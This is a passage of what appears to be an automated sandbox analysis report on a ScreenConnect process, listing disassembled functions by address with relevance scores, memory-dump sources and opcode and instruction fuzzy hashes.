                                                                                    • Instruction ID: 87f80b27f16accb7f8212954d489ff6d21739744159f19dbacfbcd1c6df15d11
                                                                                    • Opcode Fuzzy Hash: 44eb3171c9ab6aa8816482611ccfac05d07789e543dfd6b995d82a8c6981f087
                                                                                    • Instruction Fuzzy Hash: 8B31B031F6BA0FAAFBB997E44070AB963D2AF44344F554438D45DC61E2EE2CBA028641
                                                                                    Function 00007FFD9B9348C9 Relevance: .1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7ae27ce24338d65a935f3407ebd949f7dd298b4fd674392d05bea80e238cda8
                                                                                    • Instruction ID: 089f12e079a8fcbff68f1467453b3181cd1ac8de28093860af735cf506318daa
                                                                                    • Opcode Fuzzy Hash: f7ae27ce24338d65a935f3407ebd949f7dd298b4fd674392d05bea80e238cda8
                                                                                    • Instruction Fuzzy Hash: 6E21F121B1EA4E1BE7A4AB6C48B177077D0FF69300F4601BAE059C32D7EE58AC418381
                                                                                    Function 00007FFD9B93574D Relevance: .1, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c4e30d6ff1d00822a619a4a1d944d5d8032e2dd8a6dc532aae904851e1d5e68a
                                                                                    • Instruction ID: 6b265b3409fa38043cc8b219923e4ddbd3b65b5590c99cbc93700b4794663708
                                                                                    • Opcode Fuzzy Hash: c4e30d6ff1d00822a619a4a1d944d5d8032e2dd8a6dc532aae904851e1d5e68a
                                                                                    • Instruction Fuzzy Hash: C011B472E1FA4C8FEF90DFA448B01A97FE1EF99304F09009AD45DC72B2DA256501C701
                                                                                    Function 00007FFD9B932D4C Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6a1cb623e35b9437fdd00b5910cf3ae2ef0447a6332ac8e33d781a93249abaa
                                                                                    • Instruction ID: 17fbcdf5d55e3bf11f9611a875e8f451c0775f654237b5691e250447ffc45dcd
                                                                                    • Opcode Fuzzy Hash: c6a1cb623e35b9437fdd00b5910cf3ae2ef0447a6332ac8e33d781a93249abaa
                                                                                    • Instruction Fuzzy Hash: 6711D031B19A095FDB98EF58C061B6577A2FF68340B0541B8C45ECB2A7CE35F9068780
                                                                                    Function 00007FFD9B932DB5 Relevance: .1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2dae0288830429146c49fa6a4a516f0e0423e656f7b93e0a53174205df65f2d2
                                                                                    • Instruction ID: 8c0f9f40cca3443c1b434c9b477e1c744d37cefdee5694b7e88fa8f5a6b999fc
                                                                                    • Opcode Fuzzy Hash: 2dae0288830429146c49fa6a4a516f0e0423e656f7b93e0a53174205df65f2d2
                                                                                    • Instruction Fuzzy Hash: 8711DD31B19A495FDB98EF58C061B6177A2FF68300B0441A8C45ECB2A7CE35E9068B80
                                                                                    Function 00007FFD9B934839 Relevance: .1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47aeb1c299f0b10cda1ac1d499206eaacd7d81fa92dcce65208dbb7a88a08c4b
                                                                                    • Instruction ID: e41a52aabec75fe72df1f5ce999286c0df7031a0da3275a405fa91f30eaf1743
                                                                                    • Opcode Fuzzy Hash: 47aeb1c299f0b10cda1ac1d499206eaacd7d81fa92dcce65208dbb7a88a08c4b
                                                                                    • Instruction Fuzzy Hash: 7811A024F1EA8B1AFB79936944B03B52BE2DF45240F0B41BEC459C62EACD5C9D828301
                                                                                    Function 00007FFD9B930AE1 Relevance: .0, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b54620897215f9d3d28eb9fe4016fbfbd24e67dfe154af3b758cecbac7323ede
                                                                                    • Instruction ID: 9400061b013e0b835b8cb18b92d216e91818048c47c34386c851c04210902681
                                                                                    • Opcode Fuzzy Hash: b54620897215f9d3d28eb9fe4016fbfbd24e67dfe154af3b758cecbac7323ede
                                                                                    • Instruction Fuzzy Hash: C2E0DF2160F3D41FDB539B3998A88E43FA0EE1362030A41EFD481CF4B3E5188A89CB42
                                                                                    Function 00007FFD9B933FC9 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fdbc688ae4e7f9c748e9a66beb4d70552d3fad3deb0a659f838104fb668bca8f
                                                                                    • Instruction ID: 168ce6bfe22202cf5f95fd23606b90569148e09d573f00ce6f21226e371e7286
                                                                                    • Opcode Fuzzy Hash: fdbc688ae4e7f9c748e9a66beb4d70552d3fad3deb0a659f838104fb668bca8f
                                                                                    • Instruction Fuzzy Hash: C1F06D3540D68C9FCF42EB68E494CE67FB0EE06324B0502C7E049CB063D7258A59CB82
                                                                                    Function 00007FFD9B934850 Relevance: .0, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b604afed5dacf4660711b57bb9b89202cdde030be174027459ada01dec1c09e6
                                                                                    • Instruction ID: 686c3bab31ab2a4892355308e12b2a77e3c24ea3200f7722b875af0f30f77c78
                                                                                    • Opcode Fuzzy Hash: b604afed5dacf4660711b57bb9b89202cdde030be174027459ada01dec1c09e6
                                                                                    • Instruction Fuzzy Hash: 7AE08C15E5E64B12FF7C63B568B23B561809F05300F0B417E9419C01E9CD6C9E808592
                                                                                    Function 00007FFD9B932B69 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17398d97410a7d050ccc71358e13a332313c3efccd1befe61ef75440af5af981
                                                                                    • Instruction ID: 676100c004e97fa8c33f4cc8574a33757f5ae81272a3e3d3e92d8ba38ccda366
                                                                                    • Opcode Fuzzy Hash: 17398d97410a7d050ccc71358e13a332313c3efccd1befe61ef75440af5af981
                                                                                    • Instruction Fuzzy Hash: E7E0D850B2EFCA0BE769E72444215697381FF14700B0441FDD45D9B1DADD18FD054382
                                                                                    Function 00007FFD9B9354F8 Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5eeef6410b087866cfbf7d830f09e61e30975200b5456fef894150d7203f7706
                                                                                    • Instruction ID: 9a9234f868803edd092d8227d2978041a541f3857cc1fe5843e44db76da1810b
                                                                                    • Opcode Fuzzy Hash: 5eeef6410b087866cfbf7d830f09e61e30975200b5456fef894150d7203f7706
                                                                                    • Instruction Fuzzy Hash: 3BD05E24A75C0E0BEA1C66698868C6133D1FB68201BD940A5D80DC21B0FE1ED9C4C681
                                                                                    Function 00007FFD9B937F24 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 152ba56f3927a9ef56b39e778f663963e67241d24dc5ba7ba87dd97806101723
                                                                                    • Instruction ID: 685b0389b4ebaf252e9ed61accec599a3dcbe800c612ac37710f4752d639224c
                                                                                    • Opcode Fuzzy Hash: 152ba56f3927a9ef56b39e778f663963e67241d24dc5ba7ba87dd97806101723
                                                                                    • Instruction Fuzzy Hash: A6E0122115F6C54FDB16E774886C8547F90EE2721038A40FEC086CB1B3E91E9948C741
                                                                                    Function 00007FFD9B938433 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0baaa313bb38409d3f6610b659383dcf99313d8f3f1c9eba4ccddfd8f2cf8f88
                                                                                    • Instruction ID: baecd096164c9cf92d66dc54882b5f7bc92d6e6c08b75ab8ed5c97323326d22d
                                                                                    • Opcode Fuzzy Hash: 0baaa313bb38409d3f6610b659383dcf99313d8f3f1c9eba4ccddfd8f2cf8f88
                                                                                    • Instruction Fuzzy Hash: 4BB09201B4982D0B84E5A18C38512A84182C7C8620B8410A2E40CC625DC8486D9203C1
                                                                                    Function 00007FFD9B932E54 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.3553265864.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffd9b930000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 73088c01c45f3b61bac3ea74f178c8a1cbee7df2f212283bdc152780554f1c96
                                                                                    • Instruction ID: a60f650d8b8679311070a560663cf42d9d5a30ae0218e387275a748755010856
                                                                                    • Opcode Fuzzy Hash: 73088c01c45f3b61bac3ea74f178c8a1cbee7df2f212283bdc152780554f1c96
                                                                                    • Instruction Fuzzy Hash: 57C09B10F1A54E56F174EBA8847517D21526F88200F524435D01DC9196CE3CF7015645